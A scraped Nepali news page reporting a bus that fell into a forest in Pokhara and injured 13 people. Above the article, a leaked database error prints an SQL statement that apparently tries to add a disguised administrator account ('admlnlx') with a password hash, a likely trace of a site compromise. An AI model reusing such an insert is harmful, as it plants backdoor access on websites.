WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BI9a8q.y8T0HcsKTT.yvODGpnuA1/8/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 22:11:34', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
बस दुर्घटना हुँदा १३ घाइते – Gaule Khabar

बस दुर्घटना हुँदा १३ घाइते

बस दुर्घटना हुँदा १३ घाइते

पोखरा,पुस १२ –

पोखरा उपमहानगरपालिका–२३ निर्मलपोखरीस्थित शिवालय चोकमा आज बिहान बस दुर्घटना हुँदा १३ जना घाइते भएका छन् ।

पोखरा–२४ कृस्तिनाच्ने चौरबाट बिहान छुटेको ग१ख ३१२२ नं को बस शिवालय चोकबाट फर्काउने क्रममा सडकबाट १३२ मि तल जङ्गलमा खसेको प्रहरीले जनाएको छ ।

स्थानीय बासिन्दा र प्रहरीको सक्रियतामा घाइतेको मणिपाल शिक्षण अस्पताल, पोखरामा उपचार भइरहेको, पाँच जनालाई थप उपचारका लागि अस्पताल भर्ना गरिएको तथा बाँकी उपचारपछि घर फर्किसकेको बताइएको छ ।

अधिकांश घाइतेको टाउको, हातखुट्टा लगायत शरीरका विभिन्न अङ्गमा गम्भीर चोट लागेको अस्पताल स्रोतले जनाएको छ । बस फर्केपछि चढ्नुपर्ला भनी बाटोमा कुर्दै बसेका प्रत्यक्षदर्शी छोरेपाटन मावि ११का सबिन पौडेलले हेर्दाहेर्दै आँखा अगाडि बस जङ्गलमा खसेको बताउँदै दुर्घटनाको अवस्था हेर्दा मानवीय क्षति कम भएको जानकारी दिनुभयो ।

घटना हुनासाथ च्यापिएका बसका चालक र अर्का एक व्यक्तिलाई स्थानीयवासीले तत्काल उद्धार गरेका थिए । गाडीका चालक र सहचालक गम्भीर घाइते छन् । उपचारमा आएकामध्ये पाँच जनालाई थप उपचारका लागि अस्पतालमा भर्ना गरिएको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका